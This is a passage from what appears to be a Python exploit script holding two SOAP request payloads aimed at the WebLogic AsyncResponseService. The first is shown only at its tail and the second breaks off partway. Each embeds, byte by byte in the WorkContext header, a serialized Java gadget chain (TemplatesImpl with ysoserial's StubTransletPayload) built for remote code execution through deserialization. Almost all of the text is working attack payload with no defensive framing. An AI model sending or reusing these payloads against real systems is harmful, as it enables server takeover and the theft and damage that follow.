index="4976"><byte>46</byte></void><void index="4977"><byte>116</byte></void><void index="4978"><byte>114</byte></void><void index="4979"><byte>97</byte></void><void index="4980"><byte>110</byte></void><void index="4981"><byte>115</byte></void><void index="4982"><byte>102</byte></void><void index="4983"><byte>111</byte></void><void index="4984"><byte>114</byte></void><void index="4985"><byte>109</byte></void><void index="4986"><byte>46</byte></void><void index="4987"><byte>84</byte></void><void index="4988"><byte>101</byte></void><void index="4989"><byte>109</byte></void><void index="4990"><byte>112</byte></void><void index="4991"><byte>108</byte></void><void index="4992"><byte>97</byte></void><void index="4993"><byte>116</byte></void><void index="4994"><byte>101</byte></void><void index="4995"><byte>115</byte></void><void index="4996"><byte>0</byte></void><void index="4997"><byte>0</byte></void><void index="4998"><byte>0</byte></void><void index="4999"><byte>0</byte></void><void index="5000"><byte>0</byte></void><void index="5001"><byte>0</byte></void><void index="5002"><byte>0</byte></void><void index="5003"><byte>0</byte></void><void index="5004"><byte>0</byte></void><void index="5005"><byte>0</byte></void><void index="5006"><byte>0</byte></void><void index="5007"><byte>120</byte></void><void index="5008"><byte>112</byte></void><void index="5009"><byte>120</byte></void></array>
</void>
</array>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body>
</soapenv:Envelope>
'''
payload2 = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<array method="forName"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>
<array class="byte" length="3478">
<void index="0"><byte>-84</byte></void>
<void index="1"><byte>-19</byte></void>
<void index="2"><byte>0</byte></void>
<void index="3"><byte>5</byte></void>
<void index="4"><byte>115</byte></void>
<void index="5"><byte>114</byte></void>
<void index="6"><byte>0</byte></void>
<void index="7"><byte>23</byte></void>
<void index="8"><byte>106</byte></void>
<void index="9"><byte>97</byte></void>
<void index="10"><byte>118</byte></void>
<void index="11"><byte>97</byte></void>
<void index="12"><byte>46</byte></void>
<void index="13"><byte>117</byte></void>
<void index="14"><byte>116</byte></void>
<void index="15"><byte>105</byte></void>
<void index="16"><byte>108</byte></void>
<void index="17"><byte>46</byte></void>
<void index="18"><byte>76</byte></void>
<void index="19"><byte>105</byte></void>
<void index="20"><byte>110</byte></void>
<void index="21"><byte>107</byte></void>
<void index="22"><byte>101</byte></void>
<void index="23"><byte>100</byte></void>
<void index="24"><byte>72</byte></void>
<void index="25"><byte>97</byte></void>
<void index="26"><byte>115</byte></void>
<void index="27"><byte>104</byte></void>
<void index="28"><byte>83</byte></void>
<void index="29"><byte>101</byte></void>
<void index="30"><byte>116</byte></void>
<void index="31"><byte>-40</byte></void>
<void index="32"><byte>108</byte></void>
<void index="33"><byte>-41</byte></void>
<void index="34"><byte>90</byte></void>
<void index="35"><byte>-107</byte></void>
<void index="36"><byte>-35</byte></void>
<void index="37"><byte>42</byte></void>
<void index="38"><byte>30</byte></void>
<void index="39"><byte>2</byte></void>
<void index="40"><byte>0</byte></void>
<void index="41"><byte>0</byte></void>
<void index="42"><byte>120</byte></void>
<void index="43"><byte>114</byte></void>
<void index="44"><byte>0</byte></void>
<void index="45"><byte>17</byte></void>
<void index="46"><byte>106</byte></void>
<void index="47"><byte>97</byte></void>
<void index="48"><byte>118</byte></void>
<void index="49"><byte>97</byte></void>
<void index="50"><byte>46</byte></void>
<void index="51"><byte>117</byte></void>
<void index="52"><byte>116</byte></void>
<void index="53"><byte>105</byte></void>
<void index="54"><byte>108</byte></void>
<void index="55"><byte>46</byte></void>
<void index="56"><byte>72</byte></void>
<void index="57"><byte>97</byte></void>
<void index="58"><byte>115</byte></void>
<void index="59"><byte>104</byte></void>
<void index="60"><byte>83</byte></void>
<void index="61"><byte>101</byte></void>
<void index="62"><byte>116</byte></void>
<void index="63"><byte>-70</byte></void>
<void index="64"><byte>68</byte></void>
<void index="65"><byte>-123</byte></void>
<void index="66"><byte>-107</byte></void>
<void index="67"><byte>-106</byte></void>
<void index="68"><byte>-72</byte></void>
<void index="69"><byte>-73</byte></void>
<void index="70"><byte>52</byte></void>
<void index="71"><byte>3</byte></void>
<void index="72"><byte>0</byte></void>
<void index="73"><byte>0</byte></void>
<void index="74"><byte>120</byte></void>
<void index="75"><byte>112</byte></void>
<void index="76"><byte>119</byte></void>
<void index="77"><byte>12</byte></void>
<void index="78"><byte>0</byte></void>
<void index="79"><byte>0</byte></void>
<void index="80"><byte>0</byte></void>
<void index="81"><byte>16</byte></void>
<void index="82"><byte>63</byte></void>
<void index="83"><byte>64</byte></void>
<void index="84"><byte>0</byte></void>
<void index="85"><byte>0</byte></void>
<void index="86"><byte>0</byte></void>
<void index="87"><byte>0</byte></void>
<void index="88"><byte>0</byte></void>
<void index="89"><byte>2</byte></void>
<void index="90"><byte>115</byte></void>
<void index="91"><byte>114</byte></void>
<void index="92"><byte>0</byte></void>
<void index="93"><byte>58</byte></void>
<void index="94"><byte>99</byte></void>
<void index="95"><byte>111</byte></void>
<void index="96"><byte>109</byte></void>
<void index="97"><byte>46</byte></void>
<void index="98"><byte>115</byte></void>
<void index="99"><byte>117</byte></void>
<void index="100"><byte>110</byte></void>
<void index="101"><byte>46</byte></void>
<void index="102"><byte>111</byte></void>
<void index="103"><byte>114</byte></void>
<void index="104"><byte>103</byte></void>
<void index="105"><byte>46</byte></void>
<void index="106"><byte>97</byte></void>
<void index="107"><byte>112</byte></void>
<void index="108"><byte>97</byte></void>
<void index="109"><byte>99</byte></void>
<void index="110"><byte>104</byte></void>
<void index="111"><byte>101</byte></void>
<void index="112"><byte>46</byte></void>
<void index="113"><byte>120</byte></void>
<void index="114"><byte>97</byte></void>
<void index="115"><byte>108</byte></void>
<void index="116"><byte>97</byte></void>
<void index="117"><byte>110</byte></void>
<void index="118"><byte>46</byte></void>
<void index="119"><byte>105</byte></void>
<void index="120"><byte>110</byte></void>
<void index="121"><byte>116</byte></void>
<void index="122"><byte>101</byte></void>
<void index="123"><byte>114</byte></void>
<void index="124"><byte>110</byte></void>
<void index="125"><byte>97</byte></void>
<void index="126"><byte>108</byte></void>
<void index="127"><byte>46</byte></void>
<void index="128"><byte>120</byte></void>
<void index="129"><byte>115</byte></void>
<void index="130"><byte>108</byte></void>
<void index="131"><byte>116</byte></void>
<void index="132"><byte>99</byte></void>
<void index="133"><byte>46</byte></void>
<void index="134"><byte>116</byte></void>
<void index="135"><byte>114</byte></void>
<void index="136"><byte>97</byte></void>
<void index="137"><byte>120</byte></void>
<void index="138"><byte>46</byte></void>
<void index="139"><byte>84</byte></void>
<void index="140"><byte>101</byte></void>
<void index="141"><byte>109</byte></void>
<void index="142"><byte>112</byte></void>
<void index="143"><byte>108</byte></void>
<void index="144"><byte>97</byte></void>
<void index="145"><byte>116</byte></void>
<void index="146"><byte>101</byte></void>
<void index="147"><byte>115</byte></void>
<void index="148"><byte>73</byte></void>
<void index="149"><byte>109</byte></void>
<void index="150"><byte>112</byte></void>
<void index="151"><byte>108</byte></void>
<void index="152"><byte>9</byte></void>
<void index="153"><byte>87</byte></void>
<void index="154"><byte>79</byte></void>
<void index="155"><byte>-63</byte></void>
<void index="156"><byte>110</byte></void>
<void index="157"><byte>-84</byte></void>
<void index="158"><byte>-85</byte></void>
<void index="159"><byte>51</byte></void>
<void index="160"><byte>3</byte></void>
<void index="161"><byte>0</byte></void>
<void index="162"><byte>6</byte></void>
<void index="163"><byte>73</byte></void>
<void index="164"><byte>0</byte></void>
<void index="165"><byte>13</byte></void>
<void index="166"><byte>95</byte></void>
<void index="167"><byte>105</byte></void>
<void index="168"><byte>110</byte></void>
<void index="169"><byte>100</byte></void>
<void index="170"><byte>101</byte></void>
<void index="171"><byte>110</byte></void>
<void index="172"><byte>116</byte></void>
<void index="173"><byte>78</byte></void>
<void index="174"><byte>117</byte></void>
<void index="175"><byte>109</byte></void>
<void index="176"><byte>98</byte></void>
<void index="177"><byte>101</byte></void>
<void index="178"><byte>114</byte></void>
<void index="179"><byte>73</byte></void>
<void index="180"><byte>0</byte></void>
<void index="181"><byte>14</byte></void>
<void index="182"><byte>95</byte></void>
<void index="183"><byte>116</byte></void>
<void index="184"><byte>114</byte></void>
<void index="185"><byte>97</byte></void>
<void index="186"><byte>110</byte></void>
<void index="187"><byte>115</byte></void>
<void index="188"><byte>108</byte></void>
<void index="189"><byte>101</byte></void>
<void index="190"><byte>116</byte></void>
<void index="191"><byte>73</byte></void>
<void index="192"><byte>110</byte></void>
<void index="193"><byte>100</byte></void>
<void index="194"><byte>101</byte></void>
<void index="195"><byte>120</byte></void>
<void index="196"><byte>91</byte></void>
<void index="197"><byte>0</byte></void>
<void index="198"><byte>10</byte></void>
<void index="199"><byte>95</byte></void>
<void index="200"><byte>98</byte></void>
<void index="201"><byte>121</byte></void>
<void index="202"><byte>116</byte></void>
<void index="203"><byte>101</byte></void>
<void index="204"><byte>99</byte></void>
<void index="205"><byte>111</byte></void>
<void index="206"><byte>100</byte></void>
<void index="207"><byte>101</byte></void>
<void index="208"><byte>115</byte></void>
<void index="209"><byte>116</byte></void>
<void index="210"><byte>0</byte></void>
<void index="211"><byte>3</byte></void>
<void index="212"><byte>91</byte></void>
<void index="213"><byte>91</byte></void>
<void index="214"><byte>66</byte></void>
<void index="215"><byte>91</byte></void>
<void index="216"><byte>0</byte></void>
<void index="217"><byte>6</byte></void>
<void index="218"><byte>95</byte></void>
<void index="219"><byte>99</byte></void>
<void index="220"><byte>108</byte></void>
<void index="221"><byte>97</byte></void>
<void index="222"><byte>115</byte></void>
<void index="223"><byte>115</byte></void>
<void index="224"><byte>116</byte></void>
<void index="225"><byte>0</byte></void>
<void index="226"><byte>18</byte></void>
<void index="227"><byte>91</byte></void>
<void index="228"><byte>76</byte></void>
<void index="229"><byte>106</byte></void>
<void index="230"><byte>97</byte></void>
<void index="231"><byte>118</byte></void>
<void index="232"><byte>97</byte></void>
<void index="233"><byte>47</byte></void>
<void index="234"><byte>108</byte></void>
<void index="235"><byte>97</byte></void>
<void index="236"><byte>110</byte></void>
<void index="237"><byte>103</byte></void>
<void index="238"><byte>47</byte></void>
<void index="239"><byte>67</byte></void>
<void index="240"><byte>108</byte></void>
<void index="241"><byte>97</byte></void>
<void index="242"><byte>115</byte></void>
<void index="243"><byte>115</byte></void>
<void index="244"><byte>59</byte></void>
<void index="245"><byte>76</byte></void>
<void index="246"><byte>0</byte></void>
<void index="247"><byte>5</byte></void>
<void index="248"><byte>95</byte></void>
<void index="249"><byte>110</byte></void>
<void index="250"><byte>97</byte></void>
<void index="251"><byte>109</byte></void>
<void index="252"><byte>101</byte></void>
<void index="253"><byte>116</byte></void>
<void index="254"><byte>0</byte></void>
<void index="255"><byte>18</byte></void>
<void index="256"><byte>76</byte></void>
<void index="257"><byte>106</byte></void>
<void index="258"><byte>97</byte></void>
<void index="259"><byte>118</byte></void>
<void index="260"><byte>97</byte></void>
<void index="261"><byte>47</byte></void>
<void index="262"><byte>108</byte></void>
<void index="263"><byte>97</byte></void>
<void index="264"><byte>110</byte></void>
<void index="265"><byte>103</byte></void>
<void index="266"><byte>47</byte></void>
<void index="267"><byte>83</byte></void>
<void index="268"><byte>116</byte></void>
<void index="269"><byte>114</byte></void>
<void index="270"><byte>105</byte></void>
<void index="271"><byte>110</byte></void>
<void index="272"><byte>103</byte></void>
<void index="273"><byte>59</byte></void>
<void index="274"><byte>76</byte></void>
<void index="275"><byte>0</byte></void>
<void index="276"><byte>17</byte></void>
<void index="277"><byte>95</byte></void>
<void index="278"><byte>111</byte></void>
<void index="279"><byte>117</byte></void>
<void index="280"><byte>116</byte></void>
<void index="281"><byte>112</byte></void>
<void index="282"><byte>117</byte></void>
<void index="283"><byte>116</byte></void>
<void index="284"><byte>80</byte></void>
<void index="285"><byte>114</byte></void>
<void index="286"><byte>111</byte></void>
<void index="287"><byte>112</byte></void>
<void index="288"><byte>101</byte></void>
<void index="289"><byte>114</byte></void>
<void index="290"><byte>116</byte></void>
<void index="291"><byte>105</byte></void>
<void index="292"><byte>101</byte></void>
<void index="293"><byte>115</byte></void>
<void index="294"><byte>116</byte></void>
<void index="295"><byte>0</byte></void>
<void index="296"><byte>22</byte></void>
<void index="297"><byte>76</byte></void>
<void index="298"><byte>106</byte></void>
<void index="299"><byte>97</byte></void>
<void index="300"><byte>118</byte></void>
<void index="301"><byte>97</byte></void>
<void index="302"><byte>47</byte></void>
<void index="303"><byte>117</byte></void>
<void index="304"><byte>116</byte></void>
<void index="305"><byte>105</byte></void>
<void index="306"><byte>108</byte></void>
<void index="307"><byte>47</byte></void>
<void index="308"><byte>80</byte></void>
<void index="309"><byte>114</byte></void>
<void index="310"><byte>111</byte></void>
<void index="311"><byte>112</byte></void>
<void index="312"><byte>101</byte></void>
<void index="313"><byte>114</byte></void>
<void index="314"><byte>116</byte></void>
<void index="315"><byte>105</byte></void>
<void index="316"><byte>101</byte></void>
<void index="317"><byte>115</byte></void>
<void index="318"><byte>59</byte></void>
<void index="319"><byte>120</byte></void>
<void index="320"><byte>112</byte></void>
<void index="321"><byte>0</byte></void>
<void index="322"><byte>0</byte></void>
<void index="323"><byte>0</byte></void>
<void index="324"><byte>0</byte></void>
<void index="325"><byte>-1</byte></void>
<void index="326"><byte>-1</byte></void>
<void index="327"><byte>-1</byte></void>
<void index="328"><byte>-1</byte></void>
<void index="329"><byte>117</byte></void>
<void index="330"><byte>114</byte></void>
<void index="331"><byte>0</byte></void>
<void index="332"><byte>3</byte></void>
<void index="333"><byte>91</byte></void>
<void index="334"><byte>91</byte></void>
<void index="335"><byte>66</byte></void>
<void index="336"><byte>75</byte></void>
<void index="337"><byte>-3</byte></void>
<void index="338"><byte>25</byte></void>
<void index="339"><byte>21</byte></void>
<void index="340"><byte>103</byte></void>
<void index="341"><byte>103</byte></void>
<void index="342"><byte>-37</byte></void>
<void index="343"><byte>55</byte></void>
<void index="344"><byte>2</byte></void>
<void index="345"><byte>0</byte></void>
<void index="346"><byte>0</byte></void>
<void index="347"><byte>120</byte></void>
<void index="348"><byte>112</byte></void>
<void index="349"><byte>0</byte></void>
<void index="350"><byte>0</byte></void>
<void index="351"><byte>0</byte></void>
<void index="352"><byte>2</byte></void>
<void index="353"><byte>117</byte></void>
<void index="354"><byte>114</byte></void>
<void index="355"><byte>0</byte></void>
<void index="356"><byte>2</byte></void>
<void index="357"><byte>91</byte></void>
<void index="358"><byte>66</byte></void>
<void index="359"><byte>-84</byte></void>
<void index="360"><byte>-13</byte></void>
<void index="361"><byte>23</byte></void>
<void index="362"><byte>-8</byte></void>
<void index="363"><byte>6</byte></void>
<void index="364"><byte>8</byte></void>
<void index="365"><byte>84</byte></void>
<void index="366"><byte>-32</byte></void>
<void index="367"><byte>2</byte></void>
<void index="368"><byte>0</byte></void>
<void index="369"><byte>0</byte></void>
<void index="370"><byte>120</byte></void>
<void index="371"><byte>112</byte></void>
<void index="372"><byte>0</byte></void>
<void index="373"><byte>0</byte></void>
<void index="374"><byte>8</byte></void>
<void index="375"><byte>-82</byte></void>
<void index="376"><byte>-54</byte></void>
<void index="377"><byte>-2</byte></void>
<void index="378"><byte>-70</byte></void>
<void index="379"><byte>-66</byte></void>
<void index="380"><byte>0</byte></void>
<void index="381"><byte>0</byte></void>
<void index="382"><byte>0</byte></void>
<void index="383"><byte>50</byte></void>
<void index="384"><byte>0</byte></void>
<void index="385"><byte>99</byte></void>
<void index="386"><byte>10</byte></void>
<void index="387"><byte>0</byte></void>
<void index="388"><byte>3</byte></void>
<void index="389"><byte>0</byte></void>
<void index="390"><byte>34</byte></void>
<void index="391"><byte>7</byte></void>
<void index="392"><byte>0</byte></void>
<void index="393"><byte>97</byte></void>
<void index="394"><byte>7</byte></void>
<void index="395"><byte>0</byte></void>
<void index="396"><byte>37</byte></void>
<void index="397"><byte>7</byte></void>
<void index="398"><byte>0</byte></void>
<void index="399"><byte>38</byte></void>
<void index="400"><byte>1</byte></void>
<void index="401"><byte>0</byte></void>
<void index="402"><byte>16</byte></void>
<void index="403"><byte>115</byte></void>
<void index="404"><byte>101</byte></void>
<void index="405"><byte>114</byte></void>
<void index="406"><byte>105</byte></void>
<void index="407"><byte>97</byte></void>
<void index="408"><byte>108</byte></void>
<void index="409"><byte>86</byte></void>
<void index="410"><byte>101</byte></void>
<void index="411"><byte>114</byte></void>
<void index="412"><byte>115</byte></void>
<void index="413"><byte>105</byte></void>
<void index="414"><byte>111</byte></void>
<void index="415"><byte>110</byte></void>
<void index="416"><byte>85</byte></void>
<void index="417"><byte>73</byte></void>
<void index="418"><byte>68</byte></void>
<void index="419"><byte>1</byte></void>
<void index="420"><byte>0</byte></void>
<void index="421"><byte>1</byte></void>
<void index="422"><byte>74</byte></void>
<void index="423"><byte>1</byte></void>
<void index="424"><byte>0</byte></void>
<void index="425"><byte>13</byte></void>
<void index="426"><byte>67</byte></void>
<void index="427"><byte>111</byte></void>
<void index="428"><byte>110</byte></void>
<void index="429"><byte>115</byte></void>
<void index="430"><byte>116</byte></void>
<void index="431"><byte>97</byte></void>
<void index="432"><byte>110</byte></void>
<void index="433"><byte>116</byte></void>
<void index="434"><byte>86</byte></void>
<void index="435"><byte>97</byte></void>
<void index="436"><byte>108</byte></void>
<void index="437"><byte>117</byte></void>
<void index="438"><byte>101</byte></void>
<void index="439"><byte>5</byte></void>
<void index="440"><byte>-83</byte></void>
<void index="441"><byte>32</byte></void>
<void index="442"><byte>-109</byte></void>
<void index="443"><byte>-13</byte></void>
<void index="444"><byte>-111</byte></void>
<void index="445"><byte>-35</byte></void>
<void index="446"><byte>-17</byte></void>
<void index="447"><byte>62</byte></void>
<void index="448"><byte>1</byte></void>
<void index="449"><byte>0</byte></void>
<void index="450"><byte>6</byte></void>
<void index="451"><byte>60</byte></void>
<void index="452"><byte>105</byte></void>
<void index="453"><byte>110</byte></void>
<void index="454"><byte>105</byte></void>
<void index="455"><byte>116</byte></void>
<void index="456"><byte>62</byte></void>
<void index="457"><byte>1</byte></void>
<void index="458"><byte>0</byte></void>
<void index="459"><byte>3</byte></void>
<void index="460"><byte>40</byte></void>
<void index="461"><byte>41</byte></void>
<void index="462"><byte>86</byte></void>
<void index="463"><byte>1</byte></void>
<void index="464"><byte>0</byte></void>
<void index="465"><byte>4</byte></void>
<void index="466"><byte>67</byte></void>
<void index="467"><byte>111</byte></void>
<void index="468"><byte>100</byte></void>
<void index="469"><byte>101</byte></void>
<void index="470"><byte>1</byte></void>
<void index="471"><byte>0</byte></void>
<void index="472"><byte>15</byte></void>
<void index="473"><byte>76</byte></void>
<void index="474"><byte>105</byte></void>
<void index="475"><byte>110</byte></void>
<void index="476"><byte>101</byte></void>
<void index="477"><byte>78</byte></void>
<void index="478"><byte>117</byte></void>
<void index="479"><byte>109</byte></void>
<void index="480"><byte>98</byte></void>
<void index="481"><byte>101</byte></void>
<void index="482"><byte>114</byte></void>
<void index="483"><byte>84</byte></void>
<void index="484"><byte>97</byte></void>
<void index="485"><byte>98</byte></void>
<void index="486"><byte>108</byte></void>
<void index="487"><byte>101</byte></void>
<void index="488"><byte>1</byte></void>
<void index="489"><byte>0</byte></void>
<void index="490"><byte>18</byte></void>
<void index="491"><byte>76</byte></void>
<void index="492"><byte>111</byte></void>
<void index="493"><byte>99</byte></void>
<void index="494"><byte>97</byte></void>
<void index="495"><byte>108</byte></void>
<void index="496"><byte>86</byte></void>
<void index="497"><byte>97</byte></void>
<void index="498"><byte>114</byte></void>
<void index="499"><byte>105</byte></void>
<void index="500"><byte>97</byte></void>
<void index="501"><byte>98</byte></void>
<void index="502"><byte>108</byte></void>
<void index="503"><byte>101</byte></void>
<void index="504"><byte>84</byte></void>
<void index="505"><byte>97</byte></void>
<void index="506"><byte>98</byte></void>
<void index="507"><byte>108</byte></void>
<void index="508"><byte>101</byte></void>
<void index="509"><byte>1</byte></void>
<void index="510"><byte>0</byte></void>
<void index="511"><byte>4</byte></void>
<void index="512"><byte>116</byte></void>
<void index="513"><byte>104</byte></void>
<void index="514"><byte>105</byte></void>
<void index="515"><byte>115</byte></void>
<void index="516"><byte>1</byte></void>
<void index="517"><byte>0</byte></void>
<void index="518"><byte>19</byte></void>
<void index="519"><byte>83</byte></void>
<void index="520"><byte>116</byte></void>
<void index="521"><byte>117</byte></void>
<void index="522"><byte>98</byte></void>
<void index="523"><byte>84</byte></void>
<void index="524"><byte>114</byte></void>
<void index="525"><byte>97</byte></void>
<void index="526"><byte>110</byte></void>
<void index="527"><byte>115</byte></void>
<void index="528"><byte>108</byte></void>
<void index="529"><byte>101</byte></void>
<void index="530"><byte>116</byte></void>
<void index="531"><byte>80</byte></void>
<void index="532"><byte>97</byte></void>
<void index="533"><byte>121</byte></void>
<void index="534"><byte>108</byte></void>
<void index="535"><byte>111</byte></void>
<void index="536"><byte>97</byte></void>
<void index="537"><byte>100</byte></void>
<void index="538"><byte>1</byte></void>
<void index="539"><byte>0</byte></void>
<void index="540"><byte>12</byte></void>
<void index="541"><byte>73</byte></void>
<void index="542"><byte>110</byte></void>
<void index="543"><byte>110</byte></void>
<void index="544"><byte>101</byte></void>
<void index="545"><byte>114</byte></void>
<void index="546"><byte>67</byte></void>
<void index="547"><byte>108</byte></void>
<void index="548"><byte>97</byte></void>
<void index="549"><byte>115</byte></void>
<void index="550"><byte>115</byte></void>
<void index="551"><byte>101</byte></void>
<void index="552"><byte>115</byte></void>
<void index="553"><byte>1</byte></void>
<void index="554"><byte>0</byte></void>
<void index="555"><byte>53</byte></void>
<void index="556"><byte>76</byte></void>
<void index="557"><byte>121</byte></void>
<void index="558"><byte>115</byte></void>
<void index="559"><byte>111</byte></void>
<void index="560"><byte>115</byte></void>
<void index="561"><byte>101</byte></void>
<void index="562"><byte>114</byte></void>
<void index="563"><byte>105</byte></void>
<void index="564"><byte>97</byte></void>
<void index="565"><byte>108</byte></void>
<void index="566"><byte>47</byte></void>
<void index="567"><byte>112</byte></void>
<void index="568"><byte>97</byte></void>
<void index="569"><byte>121</byte></void>
<void index="570"><byte>108</byte></void>
<void index="571"><byte>111</byte></void>
<void index="572"><byte>97</byte></void>
<void index="573"><byte>100</byte></void>
<void index="574"><byte>115</byte></void>
<void index="575"><byte>47</byte></void>
<void index="576"><byte>117</byte></void>
<void index="577"><byte>116</byte></void>
<void index="578"><byte>105</byte></void>
<void index="579"><byte>108</byte></void>
<void index="580"><byte>47</byte></void>
<void index="581"><byte>71</byte></void>
<void index="582"><byte>97</byte></void>
<void index="583"><byte>100</byte></void>
<void index="584"><byte>103</byte></void>
<void index="585"><byte>101</byte></void>
<void index="586"><byte>116</byte></void>
<void index="587"><byte>115</byte></void>
<void index="588"><byte>36</byte></void>
<void index="589"><byte>83</byte></void>
<void index="590"><byte>116</byte></void>
<void index="591"><byte>117</byte></void>
<void index="592"><byte>98</byte></void>
<void index="593"><byte>84</byte></void>
<void index="594"><byte>114</byte></void>
<void index="595"><byte>97</byte></void>
<void index="596"><byte>110</byte></void>
<void index="597"><byte>115</byte></void>
<void index="598"><byte>108</byte></void>
<void index="599"><byte>101</byte></void>
<void index="600"><byte>116</byte></void>
<void index="601"><byte>80</byte></void>
<void index="602"><byte>97</byte></void>
<void index="603"><byte>121</byte></void>
<void index="604"><byte>108</byte></void>
<void index="605"><byte>111</byte></void>
<void index="606"><byte>97</byte></void>
<void index="607"><byte>100</byte></void>
<void index="608"><byte>59</byte></void>
<void index="609"><byte>1</byte></void>
<void index="610"><byte>0</byte></void>
<void index="611"><byte>9</byte></void>
<void index="612"><byte>116</byte></void>
<void index="613"><byte>114</byte></void>
<void index="614"><byte>97</byte></void>
<void index="615"><byte>110</byte></void>
<void index="616"><byte>115</byte></void>
<void index="617"><byte>102</byte></void>
<void index="618"><byte>111</byte></void>
<void index="619"><byte>114</byte></void>
<void index="620"><byte>109</byte></void>
<void index="621"><byte>1</byte></void>
<void index="622"><byte>0</byte></void>
<void index="623"><byte>114</byte></void>
<void index="624"><byte>40</byte></void>
<void index="625"><byte>76</byte></void>
<void index="626"><byte>99</byte></void>
<void index="627"><byte>111</byte></void>
<void index="628"><byte>109</byte></void>
<void index="629"><byte>47</byte></void>
<void index="630"><byte>115</byte></void>
<void index="631"><byte>117</byte></void>
<void index="632"><byte>110</byte></void>
<void index="633"><byte>47</byte></void>
<void index="634"><byte>111</byte></void>
<void index="635"><byte>114</byte></void>
<void index="636"><byte>103</byte></void>
<void index="637"><byte>47</byte></void>
<void index="638"><byte>97</byte></void>
<void index="639"><byte>112</byte></void>
<void index="640"><byte>97</byte></void>
<void index="641"><byte>99</byte></void>
<void index="642"><byte>104</byte></void>
<void index="643"><byte>101</byte></void>
<void index="644"><byte>47</byte></void>
<void index="645"><byte>120</byte></void>
<void index="646"><byte>97</byte></void>
<void index="647"><byte>108</byte></void>
<void index="648"><byte>97</byte></void>
<void index="649"><byte>110</byte></void>
<void index="650"><byte>47</byte></void>
<void index="651"><byte>105</byte></void>
<void index="652"><byte>110</byte></void>
<void index="653"><byte>116</byte></void>
<void index="654"><byte>101</byte></void>
<void index="655"><byte>114</byte></void>
<void index="656"><byte>110</byte></void>
<void index="657"><byte>97</byte></void>
<void index="658"><byte>108</byte></void>
<void index="659"><byte>47</byte></void>
<void index="660"><byte>120</byte></void>
<void index="661"><byte>115</byte></void>
<void index="662"><byte>108</byte></void>
<void index="663"><byte>116</byte></void>
<void index="664"><byte>99</byte></void>
<void index="665"><byte>47</byte></void>
<void index="666"><byte>68</byte></void>
<void index="667"><byte>79</byte></void>
<void index="668"><byte>77</byte></void>
<void index="669"><byte>59</byte></void>
<void index="670"><byte>91</byte></void>
<void index="671"><byte>76</byte></void>
<void index="672"><byte>99</byte></void>
<void index="673"><byte>111</byte></void>
<void index="674"><byte>109</byte></void>
<void index="675"><byte>47</byte></void>
<void index="676"><byte>115</byte></void>
<void index="677"><byte>117</byte></void>
<void index="678"><byte>110</byte></void>
<void index="679"><byte>47</byte></void>
<void index="680"><byte>111</byte></void>
<void index="681"><byte>114</byte></void>
<void index="682"><byte>103</byte></void>
<void index="683"><byte>47</byte></void>
<void index="684"><byte>97</byte></void>
<void index="685"><byte>112</byte></void>
<void index="686"><byte>97</byte></void>
<void index="687"><byte>99</byte></void>
<void index="688"><byte>104</byte></void>
<void index="689"><byte>101</byte></void>
<void index="690"><byte>47</byte></void>
<void index="691"><byte>120</byte></void>
<void index="692"><byte>109</byte></void>
<void index="693"><byte>108</byte></void>
<void index="694"><byte>47</byte></void>
<void index="695"><byte>105</byte></void>
<void index="696"><byte>110</byte></void>
<void index="697"><byte>116</byte></void>
<void index="698"><byte>101</byte></void>
<void index="699"><byte>114</byte></void>
<void index="700"><byte>110</byte></void>
<void index="701"><byte>97</byte></void>
<void index="702"><byte>108</byte></void>
<void index="703"><byte>47</byte></void>
<void index="704"><byte>115</byte></void>
<void index="705"><byte>101</byte></void>
<void index="706"><byte>114</byte></void>
<void index="707"><byte>105</byte></void>
<void index="708"><byte>97</byte></void>
<void index="709"><byte>108</byte></void>
<void index="710"><byte>105</byte></void>
<void index="711"><byte>122</byte></void>
<void index="712"><byte>101</byte></void>
<void index="713"><byte>114</byte></void>
<void index="714"><byte>47</byte></void>
<void index="715"><byte>83</byte></void>
<void index="716"><byte>101</byte></void>
<void index="717"><byte>114</byte></void>
<void index="718"><byte>105</byte></void>
<void index="719"><byte>97</byte></void>
<void index="720"><byte>108</byte></void>
<void index="721"><byte>105</byte></void>
<void index="722"><byte>122</byte></void>
<void index="723"><byte>97</byte></void>
<void index="724"><byte>116</byte></void>
<void index="725"><byte>105</byte></void>
<void index="726"><byte>111</byte></void>
<void index="727"><byte>110</byte></void>
<void index="728"><byte>72</byte></void>
<void index="729"><byte>97</byte></void>
<void index="730"><byte>110</byte></void>
<void index="731"><byte>100</byte></void>
<void index="732"><byte>108</byte></void>
<void index="733"><byte>101</byte></void>
<void index="734"><byte>114</byte></void>
<void index="735"><byte>59</byte></void>
<void index="736"><byte>41</byte></void>
<void index="737"><byte>86</byte></void>
<void index="738"><byte>1</byte></void>
<void index="739"><byte>0</byte></void>
<void index="740"><byte>8</byte></void>
<void index="741"><byte>100</byte></void>
<void index="742"><byte>111</byte></void>
<void index="743"><byte>99</byte></void>
<void index="744"><byte>117</byte></void>
<void index="745"><byte>109</byte></void>
<void index="746"><byte>101</byte></void>
<void index="747"><byte>110</byte></void>
<void index="748"><byte>116</byte></void>
<void index="749"><byte>1</byte></void>
<void index="750"><byte>0</byte></void>
<void index="751"><byte>45</byte></void>
<void index="752"><byte>76</byte></void>
<void index="753"><byte>99</byte></void>
<void index="754"><byte>111</byte></void>
<void index="755"><byte>109</byte></void>
<void index="756"><byte>47</byte></void>
<void index="757"><byte>115</byte></void>
<void index="758"><byte>117</byte></void>
<void index="759"><byte>110</byte></void>
<void index="760"><byte>47</byte></void>
<void index="761"><byte>111</byte></void>
<void index="762"><byte>114</byte></void>
<void index="763"><byte>103</byte></void>
<void index="764"><byte>47</byte></void>
<void index="765"><byte>97</byte></void>
<void index="766"><byte>112</byte></void>
<void index="767"><byte>97</byte></void>
<void index="768"><byte>99</byte></void>
<void index="769"><byte>104</byte></void>
<void index="770"><byte>101</byte></void>
<void index="771"><byte>47</byte></void>
<void index="772"><byte>120</byte></void>
<void index="773"><byte>97</byte></void>
<void index="774"><byte>108</byte></void>
<void index="775"><byte>97</byte></void>
<void index="776"><byte>110</byte></void>
<void index="777"><byte>47</byte></void>
<void index="778"><byte>105</byte></void>
<void index="779"><byte>110</byte></void>
